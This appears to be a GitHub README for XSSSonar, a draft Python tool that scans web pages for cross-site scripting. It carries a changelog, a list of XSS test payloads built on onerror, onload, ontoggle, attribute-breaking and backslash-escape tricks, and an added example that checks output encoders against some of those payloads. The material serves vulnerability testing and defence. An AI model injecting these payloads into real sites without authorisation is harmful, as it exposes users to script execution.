
luigigubello/XSSSonar

XSSSonar

Little tool to look for XSS vulnerabilities in a web page.

XSS Sonar Screenshot

Info

This code is just a draft. There are still some errors to be corrected, and false positives sometimes occur.
Tested with Python 2.7.9 on Debian Jessie. I may write it for Python 3.x.

ChangeLog

0.1.6
[-] Fixed some bugs
[-] Added scan on list of POST parameters
[-] Added option to assign default value to a POST parameter
[-] Added help function

0.1.5a
[-] Fixed some bugs
[-] Less than 400 lines of code

0.1.5
[-] Added scan on POST parameters
[-] Changed name

0.1.4a
[-] Added stopwatch to know the time spent to check each URL
[-] Same features with 1500 fewer lines of code

0.1.4
[-] Check a single URL or a list.txt of sites

List of XSS Payloads

'">"'><img src=x onerror=confirm`XSS`>
"> <script>alert`XSS`</script>
'">"'><svg onload=confirm`XSS`>
"',;</script><script>confirm`XSS`</script>
'><svg onload=confirm`XSS`>
"><svg/onload=confirm`XSS`//
"><details/open/ontoggle=confirm`XSS`>
" onfocus="confirm`XSS`" autofocus=""
" onclick="confirm`XSS`"
" onmouseover="confirm`XSS`"
\"-confirm`XSS`//
\'-confirm`XSS`//
"-confirm`XSS`-"'-confirm`XSS`-'
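
Added example (not part of XSSSonar's code): a Python 3 check of which output encodings contain four payloads copied from the list above. The helper names are hypothetical; the attribute payloads are assumed to land in a quoted HTML attribute value and the backslash payloads in a quoted JavaScript string literal.

```python
import html
import json

# Constructed sample: four entries copied from the payload list above,
# grouped by the context they are assumed to be reflected into.
ATTR_PAYLOADS = [
    '\'">"\'><img src=x onerror=confirm`XSS`>',
    '" onfocus="confirm`XSS`" autofocus=""',
]
JS_PAYLOADS = ['\\"-confirm`XSS`//', "\\'-confirm`XSS`//"]


def encode_attr(value):
    """Encode for a quoted HTML attribute value: & < > " ' become entities."""
    return html.escape(value, quote=True)


def naive_js_escape(value):
    """Incomplete filter: escapes quotes but not the backslash itself."""
    return value.replace('"', '\\"').replace("'", "\\'")


def encode_js_string(value):
    """Encode for a quoted JS string literal: JSON escapes plus < > & '."""
    body = json.dumps(value)[1:-1]  # json.dumps escapes \ and " and non-ASCII
    for ch in "<>&'":
        body = body.replace(ch, "\\u%04x" % ord(ch))
    return body


def attr_is_contained(encoded):
    """True if no raw quote or angle bracket survives in the attribute value."""
    return not any(c in encoded for c in "\"'<>")


def js_string_is_contained(body):
    """True if no unescaped quote in body can terminate the string literal."""
    i = 0
    while i < len(body):
        if body[i] == "\\":
            i += 2          # skip the escaped character
            continue
        if body[i] in "\"'":
            return False    # a bare quote would end the literal
        i += 1
    return True
```

The backslash payloads are on the list because a filter that only prefixes quotes with a backslash leaves the payload's own backslash to cancel the added one; encoding the backslash as well keeps the value inside the string.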

To start

pip install fake-useragent
python xsssonar.py
